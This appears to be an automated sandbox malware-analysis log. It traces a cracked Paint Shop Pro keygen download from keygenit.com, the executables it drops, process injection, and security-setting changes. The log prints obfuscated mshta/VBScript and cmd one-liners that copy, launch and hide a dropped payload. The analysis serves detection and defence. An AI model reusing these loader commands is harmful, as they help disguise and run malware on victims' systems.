chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8550ceeb125094q2480.html1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa6bfc4f50,0x7ffa6bfc4f60,0x7ffa6bfc4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1644 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1692 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6112 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6100 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6772 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6800 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6692 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6924 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff734bea890,0x7ff734bea8a0,0x7ff734bea8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7000 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7016 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5936 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6748 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6688 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6852 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6860 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6888 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6140 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7152 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7156 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7304 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7532 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7544 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7820 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7936 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8088 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7952 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8340 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8408 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8420 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8432 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8652 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8444 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8912 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9360 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9500 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9484 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9432 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9508 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6976 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,5689097388434185271,16076865094067983567,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7000 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6124 -s 4363⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4252 -s 4723⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5872 -s 4723⤵
- Program crash
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\PQUvOF\PQUvOF.dll",PQUvOF2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Roaming\wdvujhhC:\Users\Admin\AppData\Roaming\wdvujhh2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\wdvujhh"C:\Users\Admin\AppData\Roaming\wdvujhh"3⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\fcvujhhC:\Users\Admin\AppData\Roaming\fcvujhh2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fcvujhhC:\Users\Admin\AppData\Roaming\fcvujhh3⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 676 -s 4723⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exekeygen-step-5.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~nXV" -F> nul5⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exeuQLGv.exe -P5x35C~QWmaAR8osCre6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF ""-P5x35C~QWmaAR8osCre "" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "-P5x35C~QWmaAR8osCre " =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul8⤵
-
